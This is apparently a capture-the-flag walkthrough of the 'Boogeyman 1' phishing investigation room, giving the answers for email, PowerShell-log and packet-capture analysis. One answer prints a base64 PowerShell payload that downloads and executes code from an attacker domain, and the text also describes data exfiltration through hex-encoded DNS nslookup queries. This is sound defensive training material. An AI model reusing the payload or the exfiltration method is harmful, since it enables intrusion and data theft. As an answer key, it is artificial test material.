Boogeyman 1
In this room, you will be tasked to analyse the Tactics, Techniques, and Procedures (TTPs) executed by a threat group, from obtaining initial access until achieving its objective.
Prerequisites
This room may require the combined knowledge gained from the SOC L1 Pathway. We recommend going through the following rooms before attempting this challenge.
Tshark (coming soon!)
Investigation Platform
Before we proceed, deploy the attached machine by clicking the Start Machine button in the upper-right-hand corner of the task. It may take up to 3-5 minutes to initialise the services.
The machine will start in a split-screen view. In case the VM is not visible, use the blue Show Split View button at the top-right of the page.
Artefacts
For the investigation proper, you will be provided with the following artefacts:
Copy of the phishing email (dump.eml)
Powershell Logs from Julianne's workstation (powershell.json)
Packet capture from the same workstation (capture.pcapng)
Note: The powershell.json file contains JSON-formatted PowerShell logs extracted from its original evtx file via the evtx2json tool.
You may find these files in the /home/ubuntu/Desktop/artefacts directory.
Tools
The provided VM contains the following tools at your disposal:
Thunderbird - a free and open-source cross-platform email client.
LNKParse3 - a python package for forensics of a binary file with LNK extension.
Wireshark - GUI-based packet analyser.
Tshark - CLI-based Wireshark.
jq - a lightweight and flexible command-line JSON processor.
To effectively parse and analyse the provided artefacts, you may also utilise built-in command-line tools such as:
grep
sed
awk
base64
[Email Analysis] Look at that headers!
Investigation Guide
Given the initial information, we know that the compromise started with a phishing email. Let's start with analysing the dump.eml file located in the artefacts directory. There are two ways to analyse the headers and rebuild the attachment:
The manual way uses command-line tools such as cat, grep, base64, and sed. Analyse the contents manually and build the attachment by decoding the string located at the bottom of the file.
An alternative and easier way to do this is to double-click the EML file to open it via Thunderbird. The attachment can be saved and extracted accordingly.
Once the payload from the encrypted archive is extracted, use lnkparse to extract the information inside the payload.
1) What is the email address used to send the phishing email?
I opened the dump.eml file with Thunderbird.
Answer: agriffin@bpakcaging.xyz
2) What is the email address of the victim?
Answer: julianne.westcott@hotmail.com
3) What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?
I identified the service name by searching the email’s DKIM-Signature.
Answer: elasticemail
4) What is the name of the file inside the encrypted attachment?
I downloaded the email attachment and unzipped the file using the provided code.
Answer: Invoice_20230103.lnk
5) What is the password of the encrypted attachment?
Answer: Invoice2023!
6) Based on the result of the lnkparse tool, what is the encoded payload found in the Command Line Arguments field?
Answer: aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
[Endpoint Security] Are you sure that’s an invoice?
Based on the initial findings, we discovered how the malicious attachment compromised Julianne's workstation:
A PowerShell command was executed.
Decoding the payload reveals the starting point of endpoint activities.
Investigation Guide
With the following discoveries, we should now proceed with analysing the PowerShell logs to uncover the potential impact of the attack:
Using the previous findings, we can start our analysis by searching the execution of the initial payload in the PowerShell logs.
Since the given data is JSON, we can parse it in CLI using the
jqcommand.Note that some logs are redundant and do not contain any critical information; hence can be ignored.
JQ Cheatsheet
jq is a lightweight and flexible command-line JSON processor. This tool can be used in conjunction with other text-processing commands.
You may use the following table as a guide in parsing the logs in this task.
Note: You must be familiar with the existing fields in a single log.
| Parse all JSON into beautified output | cat powershell.json | jq |
|---|---|
Print all values from a specific field without printing the field |
|
Print all values from a specific field |
|
Print values from multiple fields |
|
Sort logs based on their Timestamp |
|
Sort logs based on their Timestamp and print multiple field values |
|
You may continue learning this tool via its documentation.
1) What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order. (e.g. a.domain.com,b.domain.com)
Answer: cdn.bpakcaging.xyz,files.bpakcaging.xyz
2) What is the name of the enumeration tool downloaded by the attacker?
Answer: seatbelt
3) What is the file accessed by the attacker using the downloaded sq3.exe binary? Provide the full file path with escaped backslashes.
I tracked cd and sp3.exe to identify the file accessed by the attacker.
4) What is the software that uses the file in Q3?
Answer: Microsoft Sticky Notes
5) What is the name of the exfiltrated file?
6) What type of file uses the .kdbx file extension?
Answer: keepass
7) What is the encoding used during the exfiltration attempt of the sensitive file?
Answer: hex
8) What is the tool used for exfiltration?
Answer: nslookup
Network Traffic Analysis
Based on the PowerShell logs investigation, we have seen the full impact of the attack:
The threat actor was able to read and exfiltrate two potentially sensitive files.
The domains and ports used for the network activity were discovered, including the tool used by the threat actor for exfiltration.
Investigation Guide
Finally, we can complete the investigation by understanding the network traffic caused by the attack:
Utilise the domains and ports discovered from the previous task.
All commands executed by the attacker and all command outputs were logged and stored in the packet capture.
Follow the streams of the notable commands discovered from PowerShell logs.
Based on the PowerShell logs, we can retrieve the contents of the exfiltrated data by understanding how it was encoded and extracted.
1) What software is used by the attacker to host its presumed file/payload server?
I used Wireshark to identify the software with this filter:
Answer: python
2) What HTTP method is used by the C2 for the output of the commands executed by the attacker?
Answer: POST
3) What is the protocol used during the exfiltration activity?
Answer: dns
4) What is the password of the exfiltrated file?
I first filtered for sq3.exe and then followed the TCP stream.
He is making a SELECT statement to retrieve results from the NOTE table. We can follow the next stream from 749 to 750 to obtain the content of the SELECT statement.
We need to decode this hexadecimal using CyberChef.
Answer: %p9^3!lL^Mz47E2GaT^y
5) What is the credit card number stored inside the exfiltrated file?
I initially used Wireshark to capture the DNS traffic associated with the command-and-control (C2) server used by the attacker for data exfiltration.
We observe numerous results with characters similar to the previous query. The command used for data exfiltration splits the file using a DNS nslookup query.
We need to collect only the hex characters, so let’s remove any newlines or spaces.
Let’s decode it from hexadecimal and save it to the file protected.kdbx.
Next, we open the file using the password obtained from the previous query.
Answer: 4024007128269551
Last updated
